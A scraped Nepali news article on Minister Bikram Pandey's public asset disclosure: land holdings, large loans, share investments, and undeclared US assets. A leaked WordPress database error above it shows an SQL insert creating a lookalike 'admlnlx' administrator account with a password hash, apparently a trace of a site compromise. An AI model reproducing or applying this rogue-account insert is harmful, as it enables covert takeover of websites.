WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1tBiF8URO/J7v5z29my7SRnAJZPgw1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:05:03', '', 'admlnlx', 'admlnlx')
चितवन, मंसि २९–
चितवन घर भएका भूमी सुधार तथा व्यवस्था मन्त्री विक्रम पाण्डेले आफ्नो सम्पती विवरण सार्वजनिक गरेका छन् । उनले सम्पति विवरण सार्वजनिक गर्दै काठमाडौं, चितवन र नवलपरासीका महँगा स्थानमा करोडौं मूल्यका जग्गा रहेको विवरण देखाएका छन् ।
सार्वजनिक विवरणमा काठमाडौंमा मन्त्री पाण्डेका नाममा ११ रोपनी भन्दा बढी जग्गा रहेको छ भने चितवन र नवलपरासीमा करीव ३० बिघा जमिन देखिएको छ । पाण्डेले खरिद गरेको मूल्यका आधारमा उक्त जग्गा करीव १० करोड बराबरका छन् ।
मन्त्री पाण्डेले करीव ४३ करोड रुपैयाँ ऋण रहेको देखाएका छन् ।
मन्त्री पाण्डेले अरु बेला गाडी चढ्ने गरेपनि सम्पति विवरणमा भने आफ्नो नामा सवारी साधन नभएको देखाएका छन् । उनले सुन भने एक सय तोला पैतृक सम्पत्तिमा आएको उनले जनाएका छन् । त्यस्तै प्राइम, ग्लोबल, एभरेष्ट लगायतका विभिन्न बैंकमा गरी मन्त्री पाण्डेको करीव ७ करोडको शेयर लगानी छ ।
कालिका पावर, कालिका इनर्जी र कालिका कन्सट्रक्सन कम्पनीका मालिक पाण्डेको त्यहाँको लगानी सबै गरेर २७ करोड रुपैयाँको शेयर देखाइएको छ । राप्रपा नेता पाण्डेले मन्त्रिपरिषद सचिवालयमा बुझाएको सम्पत्ति विवरणमा भने अमेरिकामा रहेको सम्पत्ति देखाइएको छैन ।